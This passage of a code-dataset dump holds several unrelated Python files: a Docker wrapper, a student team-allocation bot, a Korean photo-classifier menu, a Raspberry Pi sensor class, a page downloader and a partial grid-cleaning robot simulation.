callback(cmd, decoded_stdout, self)\n except UnicodeDecodeError:\n LOG.error(f\"Error while decoding string: {output.decode('cp437')}\")\n return decoded_stdout\n\n @staticmethod\n def _get_exit_code(cmd: str, exec_handler, max_wait_seconds: int = 5):\n \"\"\"\n client.exec_inspect(exec_handler[\"Id\"]).get(\"ExitCode\") does not immediately returns the exit code.\n Try to wait for it for some time.\n :param exec_handler:\n :return:\n \"\"\"\n slept_seconds = 0\n while True:\n exit_code: int = DockerWrapper.client.exec_inspect(exec_handler[\"Id\"]).get(\"ExitCode\")\n LOG.debug(\"Command: '%s', exit code: %s\", cmd, exit_code)\n if exit_code is not None:\n return exit_code\n else:\n LOG.debug(\"Commnand: '%s', exit code is still None. Sleeping 1s...\")\n time.sleep(1)\n slept_seconds += 1\n if slept_seconds == max_wait_seconds:\n return None\n\n def inspect_container(self, container_id: str):\n return DockerWrapper.inspect_container(container_id)\n\n def docker_cp_from_container(self, container_path, local_target_path):\n command = f\"docker cp {self.container.id}:{container_path} {local_target_path}\"\n LOG.info(\n \"Copying container directory '%s' to local directory '%s' (container id: %s). Command was: %s\",\n container_path,\n local_target_path,\n self.container.id,\n command,\n )\n SubprocessCommandRunner.run_and_follow_stdout_stderr(command)\n\n def docker_cp_to_container(\n self,\n container_target_path,\n local_src_file,\n create_container_path_mode: CreatePathMode = None,\n double_check_with_ls: bool = False,\n ):\n # run mkdir -p if dir not exist\n self.create_directories_in_container(container_target_path, create_container_path_mode)\n command = f\"docker cp {local_src_file} {self.container.id}:{container_target_path}\"\n LOG.info(\n \"Copying local directory '%s' to container directory '%s' (container id: %s). Command was: %s\",\n local_src_file,\n container_target_path,\n self.container.id,\n command,\n )\n SubprocessCommandRunner.run_and_follow_stdout_stderr(command)\n if double_check_with_ls:\n self.exec_cmd_in_container(f\"ls -la {container_target_path}\")\n\n def create_directories_in_container(self, container_target_path: str, create_container_path_mode: CreatePathMode):\n if not create_container_path_mode:\n LOG.warning(\"Will not create directories as create_container_path_mode=%s\", create_container_path_mode)\n return\n if create_container_path_mode:\n if create_container_path_mode == CreatePathMode.PARENT_PATH:\n path_to_create = FileUtils.basename(container_target_path)\n exit_code, _ = self.exec_cmd_in_container(f\"ls {path_to_create}\", fail_on_error=False)\n elif create_container_path_mode == CreatePathMode.FULL_PATH:\n path_to_create = container_target_path\n exit_code, _ = self.exec_cmd_in_container(f\"ls {path_to_create}\", fail_on_error=False)\n else:\n raise ValueError(\"Unknown create path mode: {}\".format(create_container_path_mode))\n\n if exit_code != 0:\n self.create_dirs_in_container(path_to_create)\n\n def create_dirs_in_container(self, path_to_create):\n LOG.debug(\"Creating directories (recursive) '%s' in container '%s'\", path_to_create, self.container.id)\n exit_code, _ = self.exec_cmd_in_container(f\"mkdir -p {path_to_create}\")\n if exit_code != 0:\n raise ValueError(\n \"Failed to create directories '{}' in container {}\".format(path_to_create, self.container.id)\n )\n\n\nclass DockerFileReplacer:\n vars_to_replace = {}\n\n # https://stackoverflow.com/a/30777398/1106893\n @classmethod\n def replace_all_vars(cls, input, vars_to_replace, default=None, skip_escaped=False):\n \"\"\"Expand environment variables of form $var and ${var}.\n If parameter 'skip_escaped' is True, all escaped variable references\n (i.e. preceded by backslashes) are skipped.\n Unknown variables are set to 'default'. If 'default' is None,\n they are left unchanged.\n \"\"\"\n cls.vars_to_replace = vars_to_replace\n\n def replace_var(m):\n # m.group(0) -> '${VAR}'\n # m.group(1) -> '{VAR}'\n # m.group(2) -> 'VAR'\n varname = m.group(2) or m.group(1)\n replaced_name = (\n DockerFileReplacer.vars_to_replace[varname] if varname in DockerFileReplacer.vars_to_replace else None\n )\n if not replaced_name:\n if default:\n replaced_name = default\n else:\n replaced_name = m.group(0)\n\n return replaced_name\n\n pattern = (r\"(? Unresolved variables (LOG warning)\n # e.g. ${PYTHONPATH}\n return result\n\n @classmethod\n def add_env_var_declaration(cls, dockerfile_contents, var_name):\n lines = dockerfile_contents.split(\"\\n\")\n mod_lines = []\n for line in lines:\n if line.startswith(\"FROM\"):\n mod_lines.append(line)\n mod_lines.append(\"ARG {var}\".format(var=var_name))\n mod_lines.append('RUN echo \"{var} = ${var}\"'.format(var=var_name))\n else:\n mod_lines.append(line)\n\n return \"\\n\".join(mod_lines)\n\n\nclass DockerCompose:\n COMPOSE_FILE_TEMPLATE = \"docker-compose{profile}.yml\"\n\n @staticmethod\n def up(working_dir, profile=\"\", wait=0):\n if profile:\n profile = \"-\" + profile\n compose_file = DockerCompose.COMPOSE_FILE_TEMPLATE.format(profile=profile)\n command = \"docker-compose -f {cfile} up -d\".format(cfile=compose_file)\n SubprocessCommandRunner.run(\n command,\n working_dir=working_dir,\n log_command_result=True,\n fail_on_error=True,\n wait_after=10,\n wait_message=\"for docker compose command\",\n )\n\n @staticmethod\n def logs(working_dir):\n command = \"docker-compose logs\"\n SubprocessCommandRunner.run(command, working_dir=working_dir, log_stdout=True)\n","repo_name":"szilard-nemeth/python-commons","sub_path":"pythoncommons/docker_wrapper.py","file_name":"docker_wrapper.py","file_ext":"py","file_size_in_byte":22050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22605049820","text":"from datetime import date, datetime, timedelta\nimport logging\nfrom datetime import datetime, timedelta\nfrom itertools import groupby\nfrom random import choice\nfrom typing import List\n\nfrom bot.management.commands.notificator import notify_everybody, notify_free_students\nfrom bot.models import ProductManager, Project, Student, TeamProject, TimeSlot, PriorityStudents\n\nMAX_TEAM_MEMBERS = 3\nCALL_TIME_MINUTES = 30\nSTUDENTS_LEVELS = (\n Student.BEGINNER,\n Student.BEGINNER_PLUS,\n Student.JUNIOR,\n)\nPROJECTS_START_DATE = \"2022-01-24\"\nPROJECTS_END_DATE = \"2022-02-05\"\n\n\nlogging.basicConfig(\n level=logging.INFO,\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\n)\nlogger = logging.getLogger(__name__)\n\n\ndef find_priority_student(student: Student) -> List[Student]:\n my_pairs = []\n pairs_1 = PriorityStudents.objects.filter(student_1=student).all()\n my_pairs += [pair.student_2 for pair in pairs_1]\n pairs_2 = PriorityStudents.objects.filter(student_2=student).all()\n my_pairs += [pair.student_1 for pair in pairs_2]\n return my_pairs\n\n\ndef choose_slots(slots: List[TimeSlot]) -> List[TimeSlot]:\n max_slot = []\n for slot in slots:\n team_slots = [slot, ]\n student = slot.student\n my_team_slots = slots.copy()\n my_team_slots.remove(slot)\n my_pairs = find_priority_student(student)\n for team_slot in my_team_slots:\n if team_slot.student in my_pairs:\n team_slots.append(team_slot)\n if len(team_slots) == MAX_TEAM_MEMBERS:\n return team_slots\n if len(team_slots) > len(max_slot):\n max_slot = team_slots.copy()\n my_team_slots = slots.copy()\n for slot in max_slot:\n my_team_slots.remove(slot)\n for i in range(MAX_TEAM_MEMBERS - len(max_slot)):\n logger.info(i)\n new_choice = choice(my_team_slots)\n max_slot.append(new_choice)\n my_team_slots.remove(new_choice)\n return max_slot\n\n\ndef make_teams():\n \"\"\"Распределение учеников по командам и менеджерам.\"\"\"\n if not Student.objects.exists():\n return \"Нет учеников, сначала необходимо зарегистрировать учеников.\"\n if not ProductManager.objects.exists():\n return \"Нет менеджеров, сначала необходимо зарегистрировать менеджеров.\"\n\n students_count = Student.objects.count()\n pm_count = ProductManager.objects.count()\n max_teams_of_manager = students_count // MAX_TEAM_MEMBERS // pm_count\n\n for pm in ProductManager.objects.all():\n pm_teams_count = 0\n pm_timeslots = TimeSlot.objects.filter(\n product_manager=pm, student__isnull=True, status=TimeSlot.FREE\n )\n\n for pm_timeslot in pm_timeslots:\n if pm_teams_count == max_teams_of_manager:\n break\n\n for level in STUDENTS_LEVELS:\n if pm_teams_count == max_teams_of_manager:\n break\n\n students_timeslots = TimeSlot.objects.filter(\n time_slot=pm_timeslot.time_slot,\n product_manager__isnull=True,\n student__isnull=False,\n student__level=level,\n status=TimeSlot.FREE,\n ) # TODO: add disctinct by student?\n\n if students_timeslots.count() < MAX_TEAM_MEMBERS:\n continue\n\n team_timeslots = choose_slots(list(students_timeslots))\n # team_timeslots = students_timeslots[:3]\n\n typical_project = choice(Project.objects.all())\n team_project = TeamProject.objects.create(\n date_start=datetime.fromisoformat(PROJECTS_START_DATE),\n date_end=datetime.fromisoformat(PROJECTS_END_DATE),\n project=typical_project,\n )\n\n for slot in team_timeslots:\n slot.product_manager = pm\n slot.team_project = team_project\n slot.status = TimeSlot.BUSY\n slot.save()\n for slot in slot.student.timeslots.filter(status=TimeSlot.FREE):\n slot.status = TimeSlot.NON_ACTUAL\n slot.save()\n\n pm_teams_count += 1\n pm_timeslot.status = TimeSlot.NON_ACTUAL\n pm_timeslot.save()\n break\n\n notify_everybody()\n notify_free_students(get_unallocated_students())\n return \"Распределение успешно\"\n\n\ndef cancel_distribution():\n \"\"\"Отмена распределения, только для непрошедщих проектов.\"\"\"\n\n busy_timeslots = TimeSlot.objects.filter(\n status=TimeSlot.BUSY,\n team_project__date_end__gte=datetime.now(),\n )\n if not busy_timeslots.exists():\n return \"Не найдено временных слотов!\"\n\n for slot in busy_timeslots:\n slot.product_manager = None\n slot.team_project = None\n slot.status = TimeSlot.FREE\n slot.save()\n\n non_actual_timeslots = TimeSlot.objects.filter(\n status=TimeSlot.NON_ACTUAL,\n )\n\n for slot in non_actual_timeslots:\n slot.status = TimeSlot.FREE\n slot.save()\n\n return \"Отмена распределения выполнена успешно\"\n\n\ndef get_unallocated_students():\n \"\"\"Выборка нераспределенных по ПМам и груп��ам учеников,\n т.е. тех, у которых все таймслоты имеют статус 'FREE'.\"\"\"\n\n students = Student.objects.all()\n unallocated_students = []\n for student in students:\n timeslot_status_dict = student.timeslots.all().values(\"status\")\n if all(item[\"status\"] == TimeSlot.FREE for item in timeslot_status_dict):\n unallocated_students.append(student)\n\n return unallocated_students\n\n\ndef _timestamps_by_range(time_start, time_end):\n time_delta = timedelta(minutes=CALL_TIME_MINUTES)\n timestamps = []\n\n while time_start <= time_end:\n timestamps.append(time_start.time())\n time_start += time_delta\n\n return timestamps\n\n\ndef _create_timeslot(time_slot=None, student=None, pm=None, team_project=None):\n \"\"\"Создает записи таймслота для заданого времени.\"\"\"\n\n return TimeSlot.objects.get_or_create(\n time_slot=time_slot,\n student=student,\n product_manager=pm,\n team_project=team_project,\n )\n\n\ndef make_timeslots(time_start, time_end, tg_id, project=None):\n \"\"\"Создание таймслотов для ученика или менеджера.\"\"\"\n\n try:\n pm = ProductManager.objects.get(tg_id=tg_id)\n except ProductManager.DoesNotExist:\n pm = None\n\n try:\n student = Student.objects.get(tg_id=tg_id)\n except Student.DoesNotExist:\n student = None\n\n time_stamps = _timestamps_by_range(time_start, time_end)\n\n for time_stamp in time_stamps:\n _create_timeslot(\n time_slot=time_stamp, pm=pm, student=student, team_project=project\n )\n\n\ndef get_teams():\n \"\"\"Возвращает список словарей команд\n сгруппированных по менеджеру и времени созвона.\"\"\"\n\n busy_timeslots = TimeSlot.objects.filter(status=TimeSlot.BUSY).values(\n \"id\", \"time_slot\", \"product_manager__id\", \"student__id\"\n )\n sort_func = lambda timeslot: (\n timeslot[\"product_manager__id\"],\n timeslot[\"time_slot\"],\n )\n\n busy_timeslots_sorted = sorted(busy_timeslots, key=sort_func)\n teams = groupby(busy_timeslots_sorted, key=sort_func)\n teams_list = []\n\n for keys, timeslot_values in teams:\n pm_id, time = keys\n teams_list.append(\n {\n \"pm_id\": pm_id,\n \"time\": time,\n \"time_slot_vals\": list(timeslot_values),\n }\n )\n\n return teams_list\n\n\ndef shift_pm_teams(tg_id, minutes_shift, projects_start_after=datetime.now()):\n \"\"\"Сдвиг всех таймслотов ПМа со статусом BUSY всперед на minutes_shift.\n projects_start_after - дата старше которой выбираются проекты команды.\"\"\"\n if minutes_shift > 60:\n raise AssertionError(\"Сдвиг не должен превышать 60 минут!\")\n\n time_delta = timedelta(minutes=minutes_shift)\n\n pm = ProductManager.objects.get(tg_id=tg_id)\n pm_timeslots = TimeSlot.objects.filter(\n product_manager=pm,\n status=TimeSlot.BUSY,\n team_project__date_start__gte=projects_start_after,\n )\n\n for timeslot in pm_timeslots:\n dt = (\n datetime.combine(\n date.today(),\n timeslot.time_slot,\n )\n + time_delta\n )\n timeslot.time_slot = dt.time()\n timeslot.save()\n","repo_name":"tarodo/ProjectsAutomation","sub_path":"bot/utils/timeslots_utils.py","file_name":"timeslots_utils.py","file_ext":"py","file_size_in_byte":9099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21787954344","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nfrom collections import OrderedDict\r\nfrom FileClassifier import *\r\nimport FileMoverToRoot as fmrModule\r\n\r\n#처음 작업 위치는 C드라이브 밑으로 변경한다.\r\npath_dir = 'C:/'\r\n#C드라이브 밑에 모든 파일 및 폴더명을 리스트로 가진다.\r\nfileName_list = os.listdir(path_dir)\r\nfileName = \"\"\r\nclassifier_obj = None\r\nsecond_sort_dict = {}\r\n\r\n#폴더생성 함수\r\ndef createfolder(directory):\r\n os.chdir('C:/')\r\n try:\r\n if not os.path.exists(directory):\r\n os.makedirs(directory)\r\n except OSError:\r\n print(\"Error: Creating Directory\" + directory)\r\n\r\n#시작 함수\r\ndef start():\r\n while True:\r\n isValidFN = False\r\n while not isValidFN:\r\n print(\"작업 폴더명을 입력하여 주십시오 : \",end='')\r\n fileName = sys.stdin.readline().rstrip()\r\n Enter = \"\"\r\n Space = r\"\\s+\"\r\n Space_check = re.compile(r\"\\s+\")\r\n if Space_check.search(fileName):\r\n print(\"파일명에 공백이 존재하면 안됩니다\")\r\n else:\r\n isValidFN = True\r\n # fileName = input(\"작업 폴더명을 지정해주세요 : \")\r\n # print(fileName)\r\n # Enter = \"\"\r\n # Space = r\"\\s+\"\r\n # Space_check = re.compile(Space)\r\n # 역슬래쉬 부분에 대한 고찰이 필요하다... 해결\r\n #if fileName not in fileName_list and len(fileName) <= 50 and all([c not in \"\\/:.?<>|\" for c in fileName]):\r\n\r\n if fileName not in fileName_list and len(fileName) <= 50 \\\r\n and fileName is not Enter and all([c not in r\"\\/:.?\\\"<>|*\" for c in fileName]):\r\n createfolder(fileName)\r\n print(\"작업 폴더가 \" + fileName + \" 이라는 이름으로 생성되었습니다.\")\r\n return fileName\r\n\r\n #파일명 중복의 경우\r\n elif fileName in fileName_list:\r\n print(\"파일명이 중복되었습니다. 다시 지정해주세요.\\n\")\r\n\r\n #파일명이 0이거나 50이상인 경우\r\n #elif len(fileName) > 50 or len(fileName) == 0:\r\n #공백에 대한 예외처리 필요...미해결\r\n elif len(fileName) > 50 or fileName is Enter or Space_check.match(fileName):\r\n print(\"파일명 지정은 50자이내 입니다.(파일명 미지정도 불가합니다.) 다시 설정해주세요.\\n\")\r\n\r\n #파일명에 붙일 수 없는 특수문자를 붙인 경우\r\n elif [c in r\"\\/:.?<>\\\"|*\" for c in fileName]:\r\n print('''{/ , \\ , : , . , | , < , > , ?, *,\"} 는 파일명에 포함될 수 없습니다. 다시 지정해주세요.\\n''')\r\n\r\n#분류 작업 선택 전 사진 파일이 작업 폴더에 존재하는지 확인\r\ndef photochecker(fileName):\r\n print(\"사진파일을 작업 폴더에 넣어주세요.\\n\")\r\n\r\n myPath = 'C:/' + fileName\r\n file_list = os.listdir(myPath)\r\n '''\r\n file_list_photo = [file for file in file_list if file.endswith(\".bmp\") or file.endswith(\".jpg\") or\r\n file.endswith(\".png\") or file.endswith(\".gif\")]\r\n '''\r\n file_list_photo = [file for file in file_list if file.endswith(\".bmp\") or\r\n file.endswith(\".jpeg\") or file.endswith(\".jpg\") or file.endswith(\".png\") or file.endswith(\".gif\")]\r\n\r\n # while file_list_photo is not None:\r\n ### 수정 시작\r\n oklist = ['OK', 'ok', 'Ok', 'oK']\r\n while not file_list_photo:\r\n print(\"사진파일 또는 사진 폴더가 작업 폴더에 존재하지 않습니다. 사진 파일 또는 사진 폴더를 넣어주세요.\")\r\n\r\n # 중간 멈춤 이후 사진 파일이 작업 폴더에 들어오고 ok sign입력시 다음으로 넘어간다. - 미해결\r\n isok = False\r\n print('사진 파일을 넣었으면 ok를 입력하여 주십시오')\r\n while not isok:\r\n if input() in oklist:\r\n isok = True\r\n\r\n else:\r\n print(\"['OK', 'ok', 'Ok', 'oK'] 중 하나의 올바른 입력을 해주세요.\\n\")\r\n file_list = os.listdir(myPath)\r\n file_list_photo = [file for file in file_list if file.endswith(\".bmp\") or\r\n file.endswith(\".jpeg\") or file.endswith(\".jpg\") or\r\n file.endswith(\".png\") or file.endswith(\".gif\")]\r\n print(\"사진 파일이 확인되었습니다.\\n\")\r\n time.sleep(2)\r\n ## 수정끝\r\n\r\n\r\n\r\n\r\n#ok 입력을 두 번 받게 되어 없애기로 하였다.\r\n'''\r\n#사진 파일이 작업 폴더에 존재하는 것을 확인하고 'ok'입력을 받는다.\r\ndef okcheck():\r\n while True:\r\n okChecker = input(\"사진 파일이 확인되었습니다. 'OK'를 입력하세요 : \")\r\n list = ['OK', 'ok', 'Ok', 'oK']\r\n\r\n if okChecker in list:\r\n print(\"확인되었습니다.\\n\")\r\n break\r\n else:\r\n print(\"['OK', 'ok', 'Ok', 'oK'] 중 하나의 올바른 입력을 해주세요.\\n\")\r\n\r\n'''\r\n#사용자 분류기준 입력\r\ndef numchecker():\r\n #e = \"\\s*[1-5]{1}\\s*\"\r\n #e = r\"\\s*[1-5]{1}\\s*\"\r\n #sub = \"(\\s*[1-5]{1}\\s*) + (,\\s*[1-5]{1}\\s*){1,4}\"\r\n #sub = r\"\\s*[1-5]{1}\\s*\" + r\"(,\\s*[1-5]{1}\\s*){1,4}\"\r\n\r\n e = r\"\\s*[1-5]{1}\\s*$\"\r\n sub = r\"\\s*[1-5]{1}\\s*\" + r\"(,\\s*[1-5]{1}\\s*){1,4}$\"\r\n\r\n check1 = re.compile(e)\r\n check2 = re.compile(sub)\r\n\r\n while True:\r\n print(\"*****분류 기준*****\")\r\n print(\"1. 파일 크기\\n2. 파일 이름\\n3. 생성 날짜\\n4. 수정 날짜\\n5. 확장자\\n\")\r\n num = input(\"분류 기준을 입력하세요(ex>1,2,3) : \")\r\n if check1.match(num) or check2.match(num):\r\n number = re.compile(r\"\\s+\")\r\n num = re.sub(number, '', num)\r\n number_array = num.split(',')\r\n number_array = list(map(float, number_array))\r\n #수정 후 추가한 part\r\n number_array = list(map(int, number_array))\r\n\r\n if check_duplicate(number_array) is True:\r\n print(\"OK\")\r\n for value in number_array:\r\n if value is 2:\r\n key_value1 = standard_filename()\r\n second_sort_dict['FILE_NAME'] = key_value1\r\n elif value is 3:\r\n key_value2 = date()\r\n second_sort_dict['CREATED_DATE'] = key_value2\r\n elif value is 4:\r\n key_value3 = date()\r\n second_sort_dict['MODIFIED_DATE'] = key_value3\r\n return number_array, second_sort_dict\r\n break\r\n else:\r\n print(\"올바른 형식의 입력이 아닙니다. 다시 입력하세요.\\n\")\r\n continue\r\n else:\r\n print(\"올바른 형식의 입력이 아닙니다. 다시 입력하세요.\\n\")\r\n continue\r\n\r\n\r\n\r\n#사용자 선택 중복검사\r\ndef check_duplicate(number_array):\r\n while True:\r\n number_array_check = list(OrderedDict.fromkeys(number_array))\r\n\r\n if number_array != number_array_check:\r\n print(\"중복된 입력입니다. 다시 입력하세요.\")\r\n return False\r\n continue\r\n\r\n elif number_array == number_array_check:\r\n return True\r\n break\r\n\r\n #한글,영어,숫자 기준 분류\r\ndef standard_filename():\r\n print(\"파일이름으로 분류합니다.\\n\")\r\n listK = [\"한글\", \"한\", \"kor\", \"korean\", \"Korean\", \"Kor\", \"KOREAN\", \"KOR\"]\r\n listE = [\"영어\", \"영\", \"eng\", \"english\", \"Eng\", \"English\", \"ENGLISH\", \"ENG\"]\r\n listN = [\"숫자\", \"num\", \"number\", \"Number\", \"Num\", \"NUM\", \"NUMBER\"]\r\n enter = \"\"\r\n while True:\r\n ken = input(\"한글/영어/숫자 中 1개를 선택하세요 : \")\r\n # 한글을 기준으로 선택했을 때\r\n if ken in listK:\r\n print(\"한글을 기준으로 파일을 분류합니다.\\n\")\r\n return ken\r\n\r\n # 알파벳을 기준으로 선택했을 때\r\n elif ken in listE:\r\n print(\"알파벳을 기준으로 파일을 분류합니다.\\n\")\r\n return ken\r\n\r\n # 숫자를 기준으로 선택했을 때\r\n elif ken in listN:\r\n print(\"숫자를 기준으로 파일을 분류합니다.\\n\")\r\n return ken\r\n\r\n # 아무 입력없이 ENTER만 받을 경우\r\n elif ken is enter:\r\n print(\"값을 입력해주세요\")\r\n\r\n # 리스트 이외의 값이나 2개 이상의 기준을 선택할 경우\r\n elif ken not in listK+listN+listE:\r\n print(\"유효한 값이 아닙니다. 혹은 2개 이상의 기준을 입력하셨습니다. 다시 입력해주세요\")\r\n\r\n###############날짜 분류기준 완료###############\r\ndef date():\r\n print(\"날짜를 기준으로 분류합니다.\")\r\n listY = [\"년\", \"년도\", \"Y\", \"Year\", \"y\", \"year\", \"YEAR\"]\r\n listM = [\"월\", \"달\", \"M\", \"Month\", \"m\", \"MONTH\"]\r\n enter = \"\"\r\n\r\n while True:\r\n date_standard = input(\"년도 or 월 中 1개를 선택하세요 : \")\r\n # 년도를 기준으로 선택했을 때\r\n if date_standard in listY:\r\n print(\"년도를 기준으로 파일을 분류합니다.\\n\")\r\n return date_standard\r\n # 파일 분류 함수연결해야함\r\n # 월을 기준으로 선택했을 때\r\n elif date_standard in listM:\r\n print(\"월을 기준으로 파일을 분류합니다.\\n\")\r\n return date_standard\r\n # 파일 분류 함수연결해야함\r\n # 분류 기준을 선택하지 않은 상태로 엔터키를 바로 입력한 경우\r\n elif date_standard is enter:\r\n print(\"값을 입력해주세요\")\r\n\r\n # 리스트 이외의 다른 값 + 년도,월 기준을 모두 입력한 경우\r\n elif date_standard not in listY + listM:\r\n print(\"유효한 값이 아닙니다. 혹은 기준을 2개 입력하셨습니다. 다시 입력해주세요\")\r\n date_standard = '' #해야되는건지고려대상 초기화 문제\r\n\r\n\r\n\r\n#########추가 작업부분 완료##############\r\ndef furtheraction__check():\r\n\r\n listY = ['Y', 'y', 'Yes', 'yes', '네', '예', 'YES']\r\n listN = ['N', 'n', 'No', 'no', '아니오', '아니요', 'NO']\r\n enter =\"\"\r\n while True:\r\n furtheractionCheck = input(\"추가 작업을 진행하시겠습니까?(Y/N) : \")\r\n if furtheractionCheck in listY:\r\n print(\"추가 작업을 실행하겠습니다.\\n\")\r\n break\r\n elif furtheractionCheck in listN:\r\n print(\"프로그램을 종료하겠습니다.\")\r\n sys.exit()\r\n # 어떠한 값도 입력하지 않고 ENTER만 입력했을 때\r\n elif furtheractionCheck is enter:\r\n print(\"값을 입력해주세요\\n\")\r\n\r\n # 리스트안에 없는 다른 값 입력했을 때 & 중복값을 입력받았을 때\r\n elif furtheractionCheck not in listN + listY:\r\n print(\"'Y', 'y', 'Yes', 'yes', '네', '예', 'YES', 'N', 'n'\"\r\n \", 'No', 'no', '아니오', '아니요', 'NO' 중 1개의 값을 입력해 주세요\\n\")\r\n furtheractionCheck=''\r\n\r\ndef furtheraction__check():\r\n\r\n listY = ['Y', 'y', 'Yes', 'yes', '네', '예', 'YES']\r\n listN = ['N', 'n', 'No', 'no', '아니오', '아니요', 'NO']\r\n enter =\"\"\r\n while True:\r\n furtheractionCheck = input(\"추가 작업을 진행하시겠습니까?(Y/N) : \")\r\n if furtheractionCheck in listY:\r\n print(\"추가 작업을 실행하겠습니다.\\n\")\r\n break\r\n elif furtheractionCheck in listN:\r\n print(\"프로그램을 종료하겠습니다.\")\r\n sys.exit()\r\n # 어떠한 값도 입력하지 않고 ENTER만 입력했을 때\r\n elif furtheractionCheck is enter:\r\n print(\"값을 입력해주세요\\n\")\r\n\r\n # 리스트안에 없는 다른 값 입력했을 때 & 중복값을 입력받았을 때\r\n elif furtheractionCheck not in listN + listY:\r\n print(\"'Y', 'y', 'Yes', 'yes', '네', '예', 'YES', 'N', 'n'\"\r\n \", 'No', 'no', '아니오', '아니요', 'NO' 중 1개의 값을 입력해 주세요\\n\")\r\n furtheractionCheck=''\r\n\r\ndef main():\r\n print(\"########################################\")\r\n print(\"#### WELCOME TO PHOTO CLASSIFIER #####\")\r\n print(\"########################################\\n\")\r\n print(\"작업 폴더를 생성합니다.\")\r\n while True:\r\n fileName = start()\r\n photochecker(fileName)\r\n # okcheck()\r\n #root폴더로 다 끌어올리는 작업 부분\r\n fmr = fmrModule.FileMoverToRoot('C:/' + fileName)\r\n fmr.moveFilesToRoot()\r\n fmr.deleteFoldersInRoot()\r\n classifier_obj = FileClassifier('C:/' + fileName)\r\n number_array, second_sort_dict = numchecker()\r\n classifier_obj.mainClassifier(number_array, second_sort_dict)\r\n furtheraction__check()\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"MingiPark/Major_Basics_Project2","sub_path":"1st Implementation/mainModule.py","file_name":"mainModule.py","file_ext":"py","file_size_in_byte":13100,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"1328274375","text":"import threading\nimport time\n\nimport Adafruit_DHT\nimport RPi.GPIO as GPIO\n\n\nDHT_TYPE = Adafruit_DHT.AM2302\nDHT_PIN = 18\nLED_PIN = 23\nSWITCH_PIN = 24\n\n\nclass PiThing(object):\n \"\"\"Internet 'thing' that can control GPIO on a Raspberry Pi.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the 'thing'.\"\"\"\n # Setup GPIO library.\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n # Setup LED as an output and switch as an input.\n GPIO.setup(LED_PIN, GPIO.OUT)\n GPIO.setup(SWITCH_PIN, GPIO.IN)\n # Create a lock to syncronize access to hardware from multiple threads.\n self._lock = threading.Lock()\n # Setup a thread to read the DHT sensor every 2 seconds and store\n # its last known value.\n self._humidity = None\n self._temperature = None\n self._dht_thread = threading.Thread(target=self._update_dht)\n self._dht_thread.daemon = True # Don't let this thread block exiting.\n self._dht_thread.start()\n\n def _update_dht(self):\n \"\"\"Main function for DHT update thread, will grab new temp & humidity\n values every two seconds.\n \"\"\"\n while True:\n with self._lock:\n # Read the humidity and temperature from the DHT sensor.\n self._humidity, self._temperature = Adafruit_DHT.read_retry(DHT_TYPE, DHT_PIN)\n # Wait 2 seconds then repeat.\n time.sleep(2.0)\n\n def get_humidity(self):\n \"\"\"Get the most recent humidity value (%).\"\"\"\n with self._lock:\n return self._humidity\n\n def get_temperature(self):\n \"\"\"Get the most recent temperature value (in degrees Celsius).\"\"\"\n with self._lock:\n return self._temperature\n\n def read_switch(self):\n \"\"\"Read the switch state and return its current value.\n \"\"\"\n with self._lock:\n return GPIO.input(SWITCH_PIN)\n\n def set_led(self, value):\n \"\"\"Set the LED to the provided value (True = on, False = off).\n \"\"\"\n with self._lock:\n GPIO.output(LED_PIN, value)\n","repo_name":"adafruit/Pi_Internet_Thing_Videos","sub_path":"Part_3/webapp/thing.py","file_name":"thing.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"34"} +{"seq_id":"6314783818","text":"import sys\nimport requests\n\n\ndef get_page(get_url):\n \"\"\"\n downloads the page specified with get_url string to index.html\n\n parameters:\n get_url: an url in the format of https://example.com/page1\n \"\"\"\n\n # get_url = \"https://plato.stanford.edu/cgi-bin/encyclopedia/random\"\n\n # header to authenticate myself as user\n headers = requests.utils.default_headers()\n\n headers.update(\n {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36\",\n \"Referer\": \"https://www.google.com/\",\n }\n )\n\n page = requests.get(get_url, headers=headers)\n print(\"requested URL\")\n\n original_stdout = sys.stdout\n with open(\"newindex.html\", \"w\", encoding=\"utf-8\") as file:\n sys.stdout = file # Change the standard output to the file we created.\n print(page.text)\n sys.stdout = original_stdout\n print(\"updated index.html\")\n\n # print(page.text)\n\nget_page(\"https://plato.stanford.edu/cgi-bin/encyclopedia/random\")\n\n# common user agents\n# https://www.networkinghowtos.com/howto/common-user-agent-list/\n","repo_name":"mttias/get_article","sub_path":"getPage.py","file_name":"getPage.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"14736105889","text":"N, M = map(int, input().split())\r\nx, y, d = map(int, input().split())\r\n\r\nvisited = [[0] * M for _ in range(N)]\r\n\r\ndx = [-1,0,1,0] \r\n# 북(0)쪽을 바라볼 때 왼쪽의 x좌표값은 -1, 동(1)쪽을 바라볼 때 왼쪽의 x좌표값은 0...\r\ndy = [0,1,0,-1]\r\n# 북(0)쪽을 바라볼 때 왼쪽의 y좌표값은 0, 동(1)쪽을 바라볼 때 왼쪽의 y좌표값은 1...\r\n\r\nfield = [list(map(int, input().split())) for _ in range(N)]\r\n\r\nvisited[x][y] = 1\r\ncnt = 1\r\n\r\nwhile True:\r\n flag = 0\r\n for i in range(4):\r\n d = (d + 3) % 4\r\n # direction = 3 - direction 보다 명확한 식\r\n #왼쪽으로 한칸 돌리면 0,1,2,3 -> 3,2,1,0이 됨.\r\n nx = x + dx[d]\r\n ny = y + dy[d]\r\n\r\n if 0 <= nx < N and 0 <= ny < M and field[nx][ny] == 0:\r\n if visited[nx][ny] == 0:\r\n visited[nx][ny] = 1\r\n x = nx\r\n y = ny\r\n cnt += 1\r\n flag = 1\r\n break\r\n if flag == 0: # 사방이 청소 불가일 떄\r\n if field[x-dx[d]][y-dy[d]] == 1:\r\n 